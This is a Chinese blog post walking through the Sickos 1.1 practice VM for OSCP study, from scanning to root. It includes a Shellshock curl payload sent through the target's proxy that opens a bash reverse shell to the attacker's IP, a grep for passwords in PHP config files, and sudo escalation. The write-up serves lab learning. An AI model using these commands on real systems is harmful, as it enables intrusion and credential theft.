OSCP Sickos 1.1 靶机渗透

Sickos 1.1 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-23

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Sickos 1.1主机ip为172.16.1.10

nmap 扫描一下

nmap -p- -A 172.16.1.10

主机开放了代理服务器,我们尝试用代理服务器扫描

nikto -h 172.16.1.10 --useproxy 172.16.1.10:3128

发现robots.txt 我们设置代理服务器查看文件

发现了/wolfcms目录,打开看看,没什么可用的,我们回到刚才nikto检测结果,提示/cgi-bin/status 对shellcode易受威胁,我们看下能否反弹shell

二、web渗透

开启msf监听

msfconsole

use multi/handler

set lhost 172.16.1.4

set lport 4444

set payload linux/x86/shell/reverse_tcp

run

开启另一个窗口发起请求,准备反弹shell

curl -v --proxy 172.16.1.10:3128 http://172.16.1.10/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/172.16.1.4/4444 0>&1"

成功反弹shell

三、提权

切换交互式shell 

/bin/sh

查看passwd文件,发现sickos用户

cat /etc/passwd

尝试寻找密码

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

配置文件里面竟然有密码,为john@123

尝试切换用户

su sickos

成功切换到sickos用户

使用sudo命令切换到root用户

sudo su root

成功切换到root用户

四、总结

总体来说没什么难度

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值